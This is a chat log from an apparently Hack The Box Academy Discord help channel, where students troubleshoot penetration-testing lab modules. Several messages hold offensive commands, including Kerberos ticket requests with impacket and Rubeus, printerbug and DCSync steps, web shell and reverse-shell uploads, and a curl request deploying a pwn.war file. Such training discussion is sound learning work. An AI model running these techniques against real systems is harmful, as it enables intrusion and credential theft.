yeah but it takes 30 min only for spawing the first RDP session and is very laggy

I assume you've switched things around like VPN config, region, etc?

I tried many times to switch vpn server

tcp udp yeah

Are you using EU or US VPN?

EU

I know it prolly sounds dumb and very well could be, but have you tried US just to check that box?

Which section are you working on?

sincerly not because I though it will be worse since im in europe but I will give it a shot and let you know... I tried tcp udp in all UE servers

Kerberos Delegation & Enumeration

but the entry point is always the same IP

I figured the same, but I have used EU a couple of times even though I am in the US and it worked.

thank you

I'll try

worse :/

That sucks, sorry. You could always open a ticket and explain what you are experiencing on your end.

Hello, I'm currently doing the "Hunting for Stuxbot" section in the "Introduction to Threat Hunting & Hunting With Elastic". I'm a bit confused but a Kibana query. The query used there seems contradictory to me. Can anyone explain that to me please?
dns.question.name:* is included then excluded from the same query

I read this ROQ example multiple times and I still can't use this on my own, does anyone know a resource that teaches ROQ separately or the only content about it is this?

I finished the module but I think learning ROQ early-on would be really good

Hi all. I just entered the correct answer for a section Skills Assessment and did not receive the "Mark Complete and Next" option. Does anyone know how to solve this?

hi anyone can help me in upload file modules? I have a problem in client-side validation module

hi can some one help me on the saml wraping attack ? i cant undestanding how to execute the attack, i already try saml rider but no success

I'm working on that exact same module right now and I'm willing to be we're both having the same problem. Can't find the correct function to disable or upload after adding the .php extension?

I could, thanks

hey idk if anyone has had an issue with the windows attacks and defense module on academy. I think I'm losing my mind because the Kali box IP is not working I've lost my moind for the last hour

whats the issue??

The IP for Linux in section 2 isn’t replying. I’m able to run the Kerberoast fine on the Win001 machine but I can’t get to Kali to run Hashcat

ss?

You mean ssh? Yea I’m trying to connect and it times out sorry I’m not in front of the computer anymore I can try again tomorrow

mmmm id have to look at the module, id have to look at it tmr what question is it?

Has anyone successfully solved the “Follow The Money” OSINT challenge? I’m currently stuck on question, 4 and can’t figure out why my solution isn’t working. Tried many permutations of the found name and partial email to no avail. Thanks in advance.

@dusk holly Please take care not to post content from modules above tier 0

okay, I was just making sure reader would understand.

Keep in mind anyone who has done the module will not really need the extra context

Kerberos Attacks: Unconstrained Delegation - Computers, I should force DC01 into authenticate to my SQL01 service, but I am not getting TGT for DC01 rather for SQL01 and darek.walker

yeah right

is this good enough

You may want to restart the target or try another server if you think you've done it right

i got a few more results than just 1

or double check your commnads etc

yeah i got for more than one too, but i could not really get TGT for DC01

i am just copying from content so it should be good, i will try to restart it

it's possible it only happens once, so you may need to restart

i forget which module but i've seen an exploit just work one time then that was it til you rebooted

yeah right just making sure, we have to start to listen on Rubeus first then exploit the Printer bug right?

yeah

thanks

I got TGT for DC01 and it is enough to read the C disk inside Domain controller right?

but i am getting access denied error

did you renew it

yeah i renewed it

let me try again, quickly to make sure

yeah still getting error

when you type klist do you see the dc01$ ticket in memory

i am in Powershell

working with Rubeus

you need to follow all the steps, and sometimes it isn't exactly 1:1

you can't just stop at getting the dc01$ ticket, you have to do the rest

yeah, I am will try, thank you for helping mate

Hi there! I'm kind of stuck with Shells & Payloads: PHP Web Shells.

When I have uploaded the .php file from WhiteWinterWolf's Web Shell to the Vendor, and I have changed the Content-Type to image/gif, forwarded twice, and then I access IP/images/vendor/phpfilename; instead of showing the webshell, it shows the whitewinterwolf webshell github repo???
Idk if its a bug or just something that I have done wrong.

fundamental linux

What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?

I tried everything, and I can't find the answer.

can someone help me

ohh damn i supposed to perform DCSync attack with it, and access with administrator TGT, wasted a lot of time on this.

Hi everyone, is this command dnsenum --dnsserver 10.129.61.71 --enum -p 0 -s 0 -o subdomains.txt -f /home/juser/Desktop/subdomains-top1million-5000.txt inlanefreight.htb correct?

Yes,it's right

i got another problem, seems like the name server generated for the DNS section is down, i tried to rigenerated the target and performed the ping command, but it doesn't work

You can dm me,and send me a screenshot

check your dm

Hello i'm strugling with Server-side Attacks > Exploiting SSRF module.
I found the other service but can't exploit it.
can someone give me some help pls 🙂

Hi! any hint for "injections attacks skill assessment" ? i could inject on description path a html, but when i tried aonther path internal not reflected i tried with another ports, but still in the same path stuck

Hello. I'm working through the Getting Started module. I'm on part 7 learning about nmap. When I spin up the target machine and connect to the VPN this is what I get when calling nmap. I tried ping too, but as indicated by the message those aren't getting through.

We can't, you are on your own

https://tenor.com/view/shocked-monkey-stan-twt-macaque-monkey-reaction-my-honest-reaction-gif-4617235472778414495

Any attempt to ask for help within an exam can lead to the termination of the exam attempt

ohh fairs

tried with '-Pn'

Yes, I followed the on screen instructions. Still didn't work.

Anyone feeling like playing THE FINALS?

And help me learn from you.

I mean the modules

if you try to dns it's reachable? maybe download another ovpn file

?

I've tried the one on the page (academy-regular) us 2 and and us 3, they all do the same thing. I don't know what DNS I would try. The text next to the target ip address can't be the dns as it doesn't change when I regenerate hosts. I've done this a few times and it's all the same.

If you are using the provided workstation, then you are already connected to the VPN

What is the Nmap command and IP you are trying to run

Ok... I DIDN'T try pwnbox. I've been in a parrot vm. That's worth a shot

Make sure to disconnect the VPN connection in your Parrot VM to not introduce any conflicts with two VPN connections running at the same time

I've shut my vm down because I gotta go do stuff I get paid for 😂. But I just tried quick on a pwnbox running on the lesson page and it did work. So whatever the problem is it's with my VM setup

The target's firewall is blocking the ping probes. Use -Pn to stop sending them and skip host discovery altogether.

Sometimes company laptops can have additional settings in the firewall that will prevent packets/data flowing through, which can be the ones from nmap

😆

Yea, I'll check firewall stuff later. What I didn't do, is try to connect to the VPN over TCP. I just kept using UDP files. That might change things.

If anyone can help with hint i’m stuck a couple days…

hello guys need some guidence, can some one give me i hint in how to resolve the saml wrapping attack module?

cwee path ?

You should be able to keyword search that one.

Hey i've been trying to do the Wordpress module, the very first question seemed easy, so i did a bunch of stuff and couldn't get it so after a couple of days gave up and looked the answer online, tried doing it by myself, didn't work i even did a feroxbuster but the flag.txt just isnt there

You can DM what you are using.

can someone help me for TNS in the footprinting we have to setup ODAT but I think that the commands are obselete

i want a password of a insta acc by hacking

yerp

The first one

Did that before feroxbuster but all files are empty or contain empty files

You play

?

Wooow

Would be fun to play and pick up some skills together.

hello,
i'm doing the web service brute force module https://academy.hackthebox.com/module/57/section/491
we are supposed to brutforce ftp user but no ftp is exposed ...

Did you scan all ports?

yes i solve the question but i thought it was a mistake

does anybody know why i can't acces a webpage but the ip address and domain are added in etc/hosts?

Are you connected to the vpn if it’s a 10.x.x.x ip?

i'm connected to pawnbox and pings are okay

Did you add the port if required?

What’s the entry?

echo "10.129.128.223 unika.htb" | sudo tee -a /etc/hosts

Is this for a module?

no port required it's from starting point lab responder

I see. Please read #welcome and #rules it will explain how to get verified and you’ll get access to #starting-point

Please ask there

pay close attention on the responses to determine the injection and from there you can code a script to exfiltrate the flag

English only please @chrome shale

@storm elk I was making cobblestone machine , and i need some tips , i have the web shell y upload via sqli , but i can get the reverse shell , can you give me some tips please.

Please read and follow instructions in #welcome that’ll give access to #boxes

This channel is solely for academy module help 🙂

okay sorry

nice to meet you bro

No problem 😄

❤️ 💪

(I haven’t done cobblestone I think, people in there will be able to help you more)

i will try again... tks

hey all, anyone recently work on the Pentest in a Nutshell module? The target box they give you does not have the vulnerabilities they indicate in the walkthrough. Just wondering if this is to be expected

Attacking Web Applications With Ffuf

Noticed earlier after doing some of the ffuf modules that there's an RSS summary file on my desktop, is this normal / anyone know where it came from? Please @ with replies

I am trying to run this command "sysmon.exe -c sysmonconfig-export.xml" in the Windows adminsitrator command prompt for this module section (https://academy.hackthebox.com/module/216/section/2301) and I get this popup:

I am confused.

I just restarted the terminal , made all of my changes to my config file and ran the command again . I have no idea what was causing the previous issue

Hey guys Im working on login brute forcing and Im in the custome word list section, I've done everything perfect, updated cupp, downloaded ruby, got the username anarchy directory and everything else that you need to do that the section talks about but when I run the hydra command to brute force the log in after 2 hours of running the attack I get multple child wit pid terminating error, anyone have any pointers on what I can do? thank you!

this the second time this happened, I thought terminating and reseting my instance would help the first time but it didnt

I see that when it's the wrong architecture, i.e. trying to run a 64 bit program on a 32 bit OS.. or trying to run an ARM program on x86_64

Yeah I made sure to keep my instance alive and then the second time around I kept an eye on my targets life span thinking that was the issue but it was still alive when I got the error

I tried the module again after a few days

I used the same commands but ||downloaded printerbug.py using wget instead of using the one preinstalled on the machine||

||either it was fixed from using a fresh machine, or by downloading the one linked in the reading||

hopefully this helps someone in the event they have the same issue

Attacking Thick Client Applications This is such a drag the app and VM is slow af

Make sure you're on the TCP VPN. Also could try changing servers or regions if it's unbearable.

Restart-Oracle Services.exe doesn't seem to start after execution when checking with ProcMon64 anyone encountering this issue while doing Attacking Thick Client Applications??? Also, x64dbg is sluggish

tried terminating instances and respawning but same performance

target as well

I'm completing the attacking common applications module and I must say people who write PoCs are some of the shittiest programmers I've ever seen

I don't think I could voluntarily write code this janky 😂

please help - LLM Output Attacks module in the skill assement, i got access to admin bot , but i dont know what to do from here with the admin bot, i tried again sqli but its not working
https://academy.hackthebox.com/module/307/section/3597

Hi all, i am currently on NoSQL Injection: https://academy.hackthebox.com/module/171/section/1690 (Server-Side Javascript Injection - Automating the process).

I tried to build my own script instead of following the module. I have almost gotten the flag. I compared the flag to my friend's and 1 char of mine is incorrect. Could someone be kind to DM me to review my code to see what went wrong?

you can dm me

for other reading: just Waf, not you

Has anyone solved the footprinting lab hard

As I am trying to fetch a message from openssl but it now fetching

Module: Using CrackMapExec
Section: Skills Assessment
Question 1: What's the password of the account you found?

I started the challenge from an unauthenticated standpoint, I tried SMB Null authentication but it didn't work, I tried guest account, disabled, I thought of enumerating usernames through jsmith.txt wordlist, but this will take a lot of time.
But just to not waste anytime, I saw the hint, it says Review "Exploiting NULL/Anonymous Session", what can you use to enumerate users?.
Which doesn't make sense, as Null auth is disabled on all of the 3 devices, SQL01, DEV01, & DC01

Any help would be appreciated, I don't know if I'm missing something or the environment is bugged.
Tried resetting the target, didn't work.

for the wireshark packet inception lab

I can't see enso224

only enso3

this is after you connect to the target

you need to select the appropriate message id

1 fetch <ID> <specifics>

I already did ....idk why it was working inside htb parrot os

But not in my attacker machine

¯_(ツ)_/¯

it worked on my machine when i did it a while ago

also make sure you turn off the pwnbox when you use your own vm

Yesss I did that

I got the flag

I have connected to the target though

so the interface doesn't exist on the target?

xfreerdp /v:10.129.43.4 /u:htb-student /p:HTB_@cademy_stdnt!
sudo -E wireshark

are the commands I ran on wireshark

sudo wireshark doesn't work and running wireshark from the /usr/bin/wireshark from the gui file explorer doesn't work either

so are you running wireshark IN the target

nope

I had used --rid-brute to enumerate users, and it worked. Did you try that?

tried it, not working.
null auth is not enabled so it makes sense that it won't work.

the module doesn't mention anything like that will look into it, trying to connect to ens224 from freerdp

have to authenticate mrb3n

dm me please

Is starting point a module ? It is the next to the last case.

ah I misread it as wireshark //V (ie wireshark with the flag //V) not wireshark in the target, I'm running wireshark in the pwnbox that's running freerdp,

no, the starting point machines are their own thing #starting-point ; read and follow #welcome instructions to gain access to it

you should be running wireshark on the target then 😉

just tried it myself and it's working fine for me

i did

Whait

We are haker

welcome @cunning gulch

please read #rules and #welcome

Ok

Hi, I have a question - where I can find the IP of target machine? I do Network Foundations and the IP from the description is not visible for me to scan

I think it is issue with the platform as I could do part of the tasks yesterday, and same commands worked yesterday

Within the questions there is a button with the text Click here to spawn the target system! once you click it after a few seconds it will populate it with the IP address of the target

Some questions may not have target(s)

Thank you, it works for me after spawning the target system. Last thing - can I submit answers with enter or only by mouse click?

try adding to hosts file?

wtf, my message has been fucked up ahahah

hello guys! I'm stuck from yesterday on using smbclient.py with kerberos

proxychains getST.py inlanefreight.ad/james -debug -hashes :HASHHHHHHHHHHHH -spn CIFS/dc02.logistics.ad

[………..]
[*] Saving ticket in james@CIFS_dc02.logistics.ad@LOGISTICS.AD.ccache

KRB5CCNAME=james@CIFS_DC02.logistics.ad@LOGISTICS.AD.ccache proxychains smbclient.py DC02.logistics.ad -k -no-pass -target-ip 172.16.118.252 -debug
I Always get this error:
[…………………]

[+] Using Kerberos Cache: james@CIFS_DC02.logistics.ad@LOGISTICS.AD.ccache
[+] Domain retrieved from CCache: INLANEFREIGHT.AD
[+] Returning cached credential for CIFS/DC02.LOGISTICS.AD@LOGISTICS.AD
[+] Using TGS from cache
[+] Changing sname from CIFS/DC02.logistics.ad@LOGISTICS.AD to CIFS/DC02.LOGISTICS.AD@INLANEFREIGHT.AD and hoping for the best
[+] Username retrieved from CCache: james
Traceback (most recent call last):
File "/............./python3.12/site-packages/impacket/smbconnection.py", line 321, in kerberosLogin
return self._SMBConnection.kerberosLogin(user, password, domain, lmhash, nthash, aesKey, kdcHost, TGT,
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/............./python3.12/site-packages/impacket/smb3.py", line 832, in kerberosLogin
if ans.isValidAnswer(STATUS_SUCCESS):
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/............./python3.12/site-packages/impacket/smb3structs.py", line 460, in isValidAnswer
raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_MORE_PROCESSING_REQUIRED({Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.)

Hi , i wanna play some blue CTF , how can i sort them in CTFs

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/............./bin/smbclient.py", line 103, in main
smbClient.kerberosLogin(username, password, domain, lmhash, nthash, options.aesKey, options.dc_ip )
File "/............./python3.12/site-packages/impacket/smbconnection.py", line 324, in kerberosLogin
raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: code: 0xc0000016 - STATUS_MORE_PROCESSING_REQUIRED - {Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.
[-] SMB SessionError: code: 0xc0000016 - STATUS_MORE_PROCESSING_REQUIRED - {Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.

Blue CTFs have their own page on the platform called Sherlocks

thanks , the remaining challanges all are red?

The challenges page is for specific categories like OSINT, pwn, reverse, crypto, etc.
The machines page is all red

also i used to play the CTFs in SIEM . how can i find those ? in THM i would just search splunk and they would show up

I'm an all red guy, so I don't know much about blue stuff on the platform lol.
Someone else will answer tho if they know.

Yes I did it. I tested and works fine in Pwnbox but not on my VM so I dunno what's the issue

Sherlocks is what you want

Thanks for the attention

Hello everyone. I have a problem with the submission of the skill assessment model in Applications of AI in InfoSec. The model I created on my machine works on the provided dataset and performs well, however when I upload it to the verification server, I get 0.0%, which is the same when I upload an invalid model. I am not sure how to proceed or 'debug' this situation. Can someone help me?

Did you run it with -debug at all?

Anyone done AI Red teamer path? How was it?

You get this sorted out?

Yes, but still stuck on the same question XD
I know the password that I have to use (this is because I bruteforced it into the answer to save myself time from spraying a wrong password over 2355 users )
But, I cannot seem to get the correct username.
Tried the password on SQL01 smb NTLM auth & smb local auth, nothing.
Tried the password on DC01 smb kerberos & ldap NTLM auth, still nothing.
Now I'm trying it on DC01 smb local auth.
I don't know if It's supposed to work on SQL01 or am I supposed to suffer like this LOL

You can DM what you are trying and I am going to have to delete your screenshot.

guys i need some help .i have the pcap and have found the malware name but it asks for the virustotal hash . i can not find it in VT

did anyone solve https://academy.hackthebox.com/module/113/section/2139?

I did.
But I had no Idea what I was doing I just replicated each step from the section

You can ask your question, if I know the answer I'll help, if I don't, I'm sure someone else will

Because it is incorrect? I'd look over the SSL certs.

Oh this was my nightmare on this whole path

did that, still didn't get it. I can extract and get the restart-service.exe, but can't go past that. Literally followed the steps.

yup that's what I tried, having only the exit breakpoint and looking for the executable stored in the region, as dictated by them

I skipped

#!/bin/bash

var="8dm7KsjU28B7v621Jls"
value="ERmFRMVZ0U2paTlJYTkxDZz09Cg"

for i in {1..40}
do
var=$(echo "$var" | base64) # Encode with adding newline
if [[ "$var" == "$value" && $(echo "$var" | wc -c) -gt 113450 ]]; then
echo "$var" | tail -c 20 # Print last 19 chars + newline
break
fi
done

Hi, i'm stuck doing the exercise in "Rouge Actions" section of "Attacking AI - Application and System ", I discovered that Time SQL injection can work for getting the flag, but i'm not sure it's the intended way.. If someone has done it can dm me?

Hlo

Guys

Can anyone guide

Guide me

I want to learn things in ethical hacking

I have many doubts

please anyone give me some time and clear my doubts

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Hi, I'm having an issue with wpscan in the "Linux Information Gathering" section of the module Pentest in a Nutshell.
wpscan command is not returning the same 'theme' and 'Plugin' information as it has in the walkthrough, the rest of the output is fine tho. I would appreciate it if anyone could help me

I am in the intro to network traffic analysis and I can't get wireshark to run a capture on any of the interfaces. This is in the Familiarity with Wireshark section. I am not connecting to a target host. The lab just wants me to capture traffic on any of the interfaces. The error says I don't have permission to capture traffic on XYZ interface.

Run wireshark as sudo

I tried that and it didn't work.

Pm

I would say it's probably because you are not using an API key

Create an account at wpscan website and get a free API key and use it

Tried that to no avail both on my own vm or the pwnbox. But in the walkthrough's example the plugin and theme shows up fine

What command are you running?

😈

wpscan -e p --url https://1.2.3.4 --disable-tls-checks --no-banner --plugins-detection passive -t 100

same as the one given in the guide

Try to just run wpscan --url <url> --enumerate --api-key <api key>

I'm writing it from memory lol so adjust that based on the actual flags

Thanks for that but same output, no improvement

Hmm, this is weird.
Maybe try to update the tool?
I beleive it is wpscan --update or smth

I'm using the latest docker image

I'm not familiar with that module tbh, but did they show how to manually enumerate plugins / themes with curl or not?

If not, try to run wpscan on different pages

It is weird, but the solution gets around this by grep ing the html code, So I'll just do it that way for now

I'm just confused as to why the tool doesn't do the same thing for me

but thanks for your help

I am begginear

You posted this same stuff earlier and were provided with a link for information that is related to beginners. This channel is for assistance with HTB Academy modules and your posts are not related to any of the modules. Please refrain from posting that to this channel. You should go to #welcome to verify your account and gain access to other channels that are more for asking questions related to your doubts. I would also recommend reading over the #rules

The exercise doesn't have to be the same as the lesson.
A lot of the times I learn from a section on a specific scenario then the exercise will be a completely different one, but can be solved with the commands demonstrated

Bro I am begginear but I know many things and readed all text in htb

If you're facing issues with a specific question then better to include that sp that we know how to help better

Yeah I faced this too as well, also no haven't dumped the bin to disk, my problem is that I don't see the bin at all

I have doubt In http and https website.i saw in many toturial they teach us about to compromise http but this is big 2025 we should know about how to gain access a https website it's isn't possible to get access https website or what? please clear this

Yeah, but the weird part is I can't solve it with the commands demonstrated. The lesson showed me how to use the wpscan tool. and the exercise has the question "What is the name of the theme used by WordPress on this target?"
So when I use the tool as demonstrated by the lesson on the same target and it doesn't work, that can get a little frustrating.

http[s] are just the protocols being used, the things you learn to "hack" into a website would almost always work the same regardless

What we look for is some kind of functionality to abuse in a web app, which is unrelated to it running on either of them

ikr 😂😂😂

ive extracted the exe, which seems to print the banner correctly but locally it just exits idk y

yeah resetting the machine makes it work fine

okay finally oooof

I got it

thanks mate

hi I am on question 3 of ACL Enumeration section of AD Enumeration and Attacks module. I'm trying to get information about the specific AD subgroup and the specific user's rights over that group but my commands aren't working. I think that if I post the terminal output I will spoil. Anyone available for DM?

Can someone help me out here?

I want to show the commands I have tried but I'm scared its gonna spoil

I took a shortcut way, updated the bat file, so now the oracle.txt is created and no ps/exe, then I copied it to my machine. Wrote ps script to decode that and saved the exe.

Since I took a break and later started half way, I was assuming the first exe to be the one and running x64dbg on it because I named them the same xD.

Are you planning on updating Burp in the browser vms? Right now the burp version is so old that burp intruder doesnt work on it.

You could probably add this as /feedback so there is awareness on HTB end.

Sorry im a discord noob, dunno how to do that. Cant find any feedback channel

Type that here, click on the provided command and then provide your feedback. It should be sent to the HTB Academy team.

If you need further assistance with it, you can DM.

i am getting issue in rdp connection in malware analysis lab. Anyone having same issue??

why machine have not sqlplus ?

|| Enumerate the target Oracle database and submit the password hash of the user DBSNMP as the answer.||

please update path modules

@whole merlin I saw your post on the Erratum channel, I assume you managed to get it to work right?

@sacred rock Yes

You'll have to install it

sometimes i cant ssh into the machine does anyone know why

Way too broad of a question. There are a million reasons why you may not be able to ssh in. Some examples, you're not online, you're not on the VPN, you're using the wrong logon info, ssh isn't running on the server, firewall rules, etc. etc.

Yea sorry. Connected to the VPN and the target shows SSH open, but when I try to connect it just hangs with no response. I respawned the machine a few times, same issue. I dont even have the chance to put the login info its just blank space

Whats the command you're typing out on linux and which module

connect to sql first

before u can perform actions

doing last question of section I thought I needed help with today

I thought I needed help with question 3 but I didn't

figured it out. just had to take a break and come back to it

now on 5th and last question. we'll see if I finish the section by the time my friend is ready to pick me up

I think I'm doing increasingly better with this stuff

How long does it normally take to get full output from the right AD command for last question of sectiom

Is it like a 10 minute thing?

hi I am on the last question of this section. how long should I give this command to run?

before it gives me the output

this is for last question of ACL Enumeration section of AD Enumeration and Attacks module

hi so even when I try either of the two commands that should get me the output it never shows up

whether I run the command over the user or the group or whichever version of the command I use to specify

like it loads forever but I never get any output

wait I think I know what I am doing wrong

nope not getting it I will try again tomorrow

Anyone doing attacking thick client applications?

If you need help you're better off just asking your question

yup

have you completed the labs? I'm getting errors while doing it step by step as the module explains it.

Module 216 section 2301. Analyzing Evil with Sysmon & Event logs. I am rdp'd into a windows machine from parrotOS and everytime I try to run the sysmon application it force closes. How do I solve this issue so I can simulate the attack from this module for a DLL injection?

tell me exactly where are u getting the error

After deleting the hashes from Manifest.MF file and recompiling the jar file

has anybody done Password Attacks module. I need favor in Pass the certificate section

im stuck here can u help :
the printerbug.py runs fine :
Triggered RPC backconnect, this may or may not have worked

but i dont get any output in the ntlmrelay.py

dm

I need help in this module Skills Assessment - File Inclusion.I have got the answer but not via burp suite,I want to know how to use burpsuite to get the answer.when I changed the UA to payload ,it return 500,I cheack out error.log.but I don't understand why

dm me

have you done password attacks?

give me URL

ok

https://academy.hackthebox.com/module/147/section/1335

I have done file inclusion, i can help you in that

please dm me

check it

openssl s_client -connect 10.129.182.3:imap is this command correct?

Ok what's the error? Are u unable to recompile it?.

Anyone has solved it this way and got success? Keeps giving 500 Internal Server Error. Can someone cross-check? Thanks.

Skills Assessment - File Inclusion.

Something along the lines of can’t find files or class. I’m not in front of computer atm so can’t send you the exact screenshot

I just tried it again and it worked fine. Would be better if u show an ss

Can I Pm you?

@dire lily please don't spoil skill assessments

As for your inquiry, it's common to attempt all recovered credentials for every account, this is known as a password spray when done automatically.

Apologies. I will go and check the rules again.

Thank you!

Sure

you ever have those moments where you just go away, get a coffee and everything falls into place... after spending an hour just looking at text...

hi guys im at the skills assesment of buffer overflow in Linux but i have 2 problems
when i create the string to send :

1. the "\x90" in the memory become \xc2 and \x90
2. the shellcode with all the bad chars deleted is still not correct in memory
   help

i found the problem: for someone that have my same problem
you have to use python and not python3
because python3 with only print print not everytime correcty the byte
you have to use python or python3 with b'' and sys.stdout.buffer.write

Can I dm someone about the prompt injection attack module? I owned the skills assessment some while ago but I cannot figure out why my previous injection is not working rn

Footprinting module - SNMP section
Hi everyone, the third question is "Enumerate the custom script that is running on the system and submit its output as the answer". Have i to answer with the name of the script or with its output as the question asks?

Just the output

so have i to execute that script?

maybe ...

do some footprinting and find out

How can i do that if i have not the source code?

Do the footprinting... and find out

i get the impression you say that, a lot...

I do not... but if you're clearly not trying before asking, then I'll make you try

Try what you've learned in the SNMP section and you'll figure it out.

i just didn't understand the question

Well you don't have to understand the question, you just have to try what you've learned and maybe the answer will be obvious after

please help me with this one

It is related to the previous answer, just check a little further down the flag obtained.

I'm in the next question, i stuck

wait

@dire cedar can i dm you?

sure man

Did you try zone transfer?

yeah can you help me with another qn?

dm me

@brave field check

is it possible to extract the data from Documentation & Reporting Practice Lab?

The RDP session'd bloodhound is abit too slow and clanky to be used

I wanna just get the zip file and dump it into my local bloodhound so as to have easier and faster control w/ it

I'm on the same lab, I used the testing VM as a piviot and did everything off my main machine

So you just ligolo-ng or chisel and just do it on your main?

aight ima try this too

I'm having an issue on that with the third question. I've done both a DC_Sync and dumped the NTDS file with crackmap and secretsdump.py. But I don't see the svc_reporting user

Skills Assessment - Web Fuzzing
what's the answer template please? usually there's an example how to answer

it says the subdomain name only.. so like www.hackthebox.com would be www

to be more specific they mentioned to write all the subdomains ,so what if there are more than one sub or vhost? i've found 3

If you can perform what you are trying, can't you just perform this for the specific user you need?

i've found 3 but I don't know how to put them in the answer box

It's my understanding that you can only go through the NTDS file after you have dumped it. I'm not seeing the user when I dump it

Try each one with a space between each, like you would write them out normally.

You can DM.

I got the exact opposite of you
Though I kinda redid the enum on my own machine with the previously obtained creds

Did anyone do the "Model Deployment Tempering" exercise in AI Red Teamer Path?
I don't get what error is causing this result:

curl -X POST 'http://127.0.0.1:8081/workflows?url=http://127.0.0.1:8000/pwn.war'

{
  "code": 500,
  "type": "InvalidWorkflowException",
  "message": "Failed to parse yaml."
}```

hey im working on the attacking enterprise networks, im currently on the lateral movement section, when using proxychains with any command it just doesn't work
proxychains evil-winrm -i 172.16.8.50 -u backupadm
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
<snip>
Info: Establishing connection to remote endpoint
[proxychains] Strict chain ... 127.0.0.1:8081 ... 172.16.x.x:5985 ... OK
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code 1

i used the right password

I was wondering how do we figure out which product is used between the Dell, HP or Supermicro :
https://academy.hackthebox.com/module/112/section/1245

hello everyone, I'm working on module Upload file attack, I'm stacked on 2 section, cause in tryng to understand how open a reverse shell. It is not required for the flag, but it is explained in the section, i repeated all point, but it doesn't work.
I downloded from pentestmonkey php file reverse-shell.php, I changed the IP address with the one of my VM and I changed the port of the IP generated by the challenge. I uploated this file, downloaded this one, opened a shell using "nc -lvnp port", but it doens't work

can someone help me 🙂 ? thx to everyone

Hi everyone, i am stuck in malware analysis debugging module. I manage to get connection to C2 message but still can’t get “This is the INetSim default binary” message. And for second “sandbox detection” message if it continue given instructions which is changing je shell.402F09 to jne shell.402F09, i ma getting “sandbox detection” message and if I continue with as it is je shell.402F09, I got “connection to c2” message. Any hints to how to move forward from here??

just wanted to ask , is there any other way to earn cubes ? like without you going to have to buy it

like tier 0 modules return equal amount of cubes and when you move forward in tiers you spend more cubes and they return less , the cube system is designed that way , that you have to buy them once you get over tier 0

hello I'm in the Footprinting Medium lab and I want an hint please

guys,,for those who have done android dyamic analysis...for the insecure library load through deep linking...did your apps update from v1 to v2 after clicking the update button? when i try to do that i it doesnt update to v2

i would appreciate someone who has been able to solve it to assist

In MSSQL, EXCHANGE and Sccm Attacks skill assement i have tried pwd spray but not any luck. Am I going the wrong way? Got users but and read the policy

You can also win some by placing in the seasonal challenges

hello I'm in the Footprinting Medium lab and I want an hint please

good

Hello, in the Injection Attacks module that is part of CWEE, the PDF attacks use SSRF to ultimately find the flag. There is a point where we are supposed to use the PDF vuln to "enumerate the server" so that we can figure out an internal API we can use to exfiltrate data. Can someone explain the server enumeration? how is that supposed to happen via the PDF vuln? the solutions in the module dont provide context, they just say students should enumerate the server but dont say how

the context is gonna be in the reading

Could someone help me with the cobblestone user.txt?

as a linux user for the last 8 or so years, i'm finding stuff within Linux privilege escalation that i'd never considered...

turning out to be a nice insight from a blue team perspective.

SSRF allows you to read files on the system too, you can check for Apache config files or Nginx and see what websites are available

#boxes read and follow #welcome to be able to access it

It tells me I don't have access, is it because I'm new?

the second part of my statement tells you how to gain access

guys need help in Attacking Common Applications - Skills Assessment II. I got the answer but I just want to know whats the format
Image

is there a best practice for this or are you just trying known config files

Can someone help me in the Footprinting medium lab pls

I’m on the Peeps module and would like a hint

Look for default locations for config files as they show the ports for other webapps

I think nginx have it in /etc/nginx.conf

But yeah it's better to google those out because there's more than a default one

Also /etc/services might give something but I haven't tried that out personally

On the Windows Attacks on Defense module Kereberoasting section; I am able to kerberoast and get the file with the hashes but when I have to move it over to Linux and haven't been able to connect and I know the answer is probably in my face I cant connect to Kali with any of the IPs

in passwords attacks skill assesment, any help?

i have the student subscription in the academy if i buy the gold sub while have the student sub does my student sub get canceled which mean i lose access to tier 0,I,II ?

Can I have help in the hard lab footprinting pls

Why does google think i am deteriorating? Do i look like i fuckin eat carrots?

can you help me pls

"We adjusted your settings for a more age appropriate solution."

Oh wait this is the wrong channel

No figure it out

I'm stuck in the last lab of Footprinting (CPTS )

Good take a break and go back later

can I have a hint ?

Yes its something you missed in the modules 100%

Or you probably dont understand how to use dig

no but I don't have fqdn

can I dm you ?

Hello everyone, I'm having an issue with the virtualization module. In particular the Proxmox doesn't want to boot correctly. I've checked the RAM and CPU settings are good and once I have the ISO image inserted; everything seems to be in working order until I click enter for the "graphical" set up. It should give me text or something but instead goes black with no out put at all. can someone tell me what I'm doing wrong?

the question "What is the index number of the "sudoers" file in the "/etc" directory?" , how do you get the answer? I tried "stat /etc/sudoers" and wrote the Inode number

Anyone available to help with File Upload Attacks > Whitelist Filters > "The above exercise employs a blacklist and a whitelist test to block unwanted extensions and only allow image extensions. Try to bypass both to upload a PHP script and execute code to read "/flag.txt" "
https://academy.hackthebox.com/module/136/section/1289

I already used the bash script to generate the wordlist for fuzzing with Intruder. I have several extensions that 'should' work. I got 'File successfully uploaded' in the responses. When fuzzing I injected the PHP Hello World script. Browsing to the files I uploaded I don't see the PHP code render at all though.
It also looks like when attempting to browse to the uploaded files, my \ are changing to // which is confusing.

And in one case, I get the message "Forbidden You dont have permission to access this resource"

Make sure you are attempting all the techniques you learned about anon against all the hosts you know.

are there certain modules that you can not use the pwnbox for and need to use the VPN? that might be my issue

Can any one give a hand with Advanced Deserialization Attacks, Example 2: XML
I've gone through the whole process and have the payload and the type string but it seems that I'm not finding the correct way to combine it together. Any help would be appreciated.

NVM: Figured it out , I missed the important POST 😅

